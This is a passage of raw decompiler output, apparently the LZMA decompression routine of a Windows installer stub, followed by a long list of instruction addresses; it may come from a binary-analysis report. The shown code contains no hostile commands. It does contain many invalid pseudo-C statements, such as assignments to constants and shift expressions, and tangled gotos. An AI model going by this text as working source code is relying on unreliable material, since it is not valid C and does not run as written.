													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                  0x00000000
                  0x004062eb
                  0x004062eb
                  0x004062ef
                  0x00406310
                  0x00406317
                  0x0040631d
                  0x00406323
                  0x00406335
                  0x0040633b
                  0x00406340
                  0x00000000
                  0x004062f1
                  0x004062f7
                  0x004066b8
                  0x004066b8
                  0x004066b8
                  0x004066bb
                  0x004066bb
                  0x004066bb
                  0x004066c1
                  0x004066c7
                  0x004066cd
                  0x004066e7
                  0x004066ea
                  0x004066f0
                  0x004066fb
                  0x004066fd
                  0x004066cf
                  0x004066cf
                  0x004066de
                  0x004066e2
                  0x004066e2
                  0x00406707
                  0x00000000
                  0x00000000
                  0x00406709
                  0x0040670d
                  0x004068bc
                  0x004068d2
                  0x004068da
                  0x004068e1
                  0x004068e3
                  0x004068ea
                  0x004068ee
                  0x004068ee
                  0x00406719
                  0x00406720
                  0x00406728
                  0x0040672b
                  0x0040672e
                  0x0040672e
                  0x00406734
                  0x00406734
                  0x00405ed0
                  0x00405ed0
                  0x00405ed0
                  0x00405ed9
                  0x00000000
                  0x00000000
                  0x00405edf
                  0x00000000
                  0x00405eea
                  0x00000000
                  0x00000000
                  0x00405ef3
                  0x00405ef6
                  0x00405ef9
                  0x00405efd
                  0x00000000
                  0x00000000
                  0x00405f03
                  0x00405f06
                  0x00405f08
                  0x00405f09
                  0x00405f0c
                  0x00405f0e
                  0x00405f0f
                  0x00405f11
                  0x00405f14
                  0x00405f19
                  0x00405f1e
                  0x00405f27
                  0x00405f3a
                  0x00405f3d
                  0x00405f49
                  0x00405f71
                  0x00405f73
                  0x00405f81
                  0x00405f81
                  0x00405f85
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405f75
                  0x00405f75
                  0x00405f78
                  0x00405f79
                  0x00405f79
                  0x00000000
                  0x00405f75
                  0x00405f4f
                  0x00405f54
                  0x00405f54
                  0x00405f5d
                  0x00405f65
                  0x00405f68
                  0x00000000
                  0x00405f6e
                  0x00405f6e
                  0x00000000
                  0x00405f6e
                  0x00000000
                  0x00405f8b
                  0x00405f8b
                  0x00405f8f
                  0x0040683b
                  0x00000000
                  0x0040683b
                  0x00405f98
                  0x00405fa8
                  0x00405fab
                  0x00405fae
                  0x00405fae
                  0x00405fae
                  0x00405fb1
                  0x00405fb5
                  0x00000000
                  0x00000000
                  0x00405fb7
                  0x00405fbd
                  0x00405fe7
                  0x00405fed
                  0x00405ff4
                  0x00000000
                  0x00405ff4
                  0x00405fc3
                  0x00405fc6
                  0x00405fcb
                  0x00405fcb
                  0x00405fd6
                  0x00405fde
                  0x00405fe1
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406026
                  0x0040602c
                  0x0040602f
                  0x0040603c
                  0x00406044
                  0x00000000
                  0x00000000
                  0x00405ffb
                  0x00405ffb
                  0x00405fff
                  0x0040684a
                  0x00000000
                  0x0040684a
                  0x0040600b
                  0x00406016
                  0x00406016
                  0x00406016
                  0x00406019
                  0x0040601c
                  0x0040601f
                  0x00406024
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004066bb
                  0x004066bb
                  0x004066c1
                  0x004066c7
                  0x004066cd
                  0x004066e7
                  0x004066ea
                  0x004066f0
                  0x004066fb
                  0x004066fd
                  0x004066cf
                  0x004066cf
                  0x004066de
                  0x004066e2
                  0x004066e2
                  0x00406707
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040604c
                  0x0040604e
                  0x00406051
                  0x004060c2
                  0x004060c5
                  0x004060c8
                  0x004060cf
                  0x004060d9
                  0x004066b8
                  0x004066b8
                  0x00000000
                  0x004066b8
                  0x00406053
                  0x00406057
                  0x0040605a
                  0x0040605c
                  0x0040605f
                  0x00406062
                  0x00406064
                  0x00406067
                  0x00406069
                  0x0040606e
                  0x00406071
                  0x00406074
                  0x00406078
                  0x0040607f
                  0x00406082
                  0x00406089
                  0x0040608d
                  0x00406095
                  0x00406095
                  0x00406095
                  0x0040608f
                  0x0040608f
                  0x0040608f
                  0x00406084
                  0x00406084
                  0x00406084
                  0x00406099
                  0x0040609c
                  0x004060ba
                  0x004060bc
                  0x00000000
                  0x0040609e
                  0x0040609e
                  0x004060a1
                  0x004060a4
                  0x004060a7
                  0x004060a9
                  0x004060a9
                  0x004060a9
                  0x004060ac
                  0x004060af
                  0x004060b1
                  0x004060b2
                  0x004060b5
                  0x00000000
                  0x004060b5
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406355
                  0x00406359
                  0x0040637c
                  0x0040637f
                  0x00406382
                  0x0040638c
                  0x0040635b
                  0x0040635b
                  0x0040635e
                  0x00406361
                  0x00406364
                  0x00406371
                  0x00406374
                  0x00406374
                  0x004066b8
                  0x004066b8
                  0x004066b8
                  0x00000000
                  0x004066b8
                  0x00000000
                  0x00406398
                  0x0040639c
                  0x00000000
                  0x00000000
                  0x004063a2
                  0x004063a6
                  0x00000000
                  0x00000000
                  0x004063ac
                  0x004063ae
                  0x004063b2
                  0x004063b2
                  0x004063b5
                  0x004063b9
                  0x00000000
                  0x00000000
                  0x00406409
                  0x0040640d
                  0x00406414
                  0x00406417
                  0x0040641a
                  0x00406424
                  0x004066b8
                  0x004066b8
                  0x004066b8
                  0x00000000
                  0x004066b8
                  0x004066b8
                  0x0040640f
                  0x00000000
                  0x00000000
                  0x00406430
                  0x00406434
                  0x0040643b
                  0x0040643e
                  0x00406441
                  0x00406436
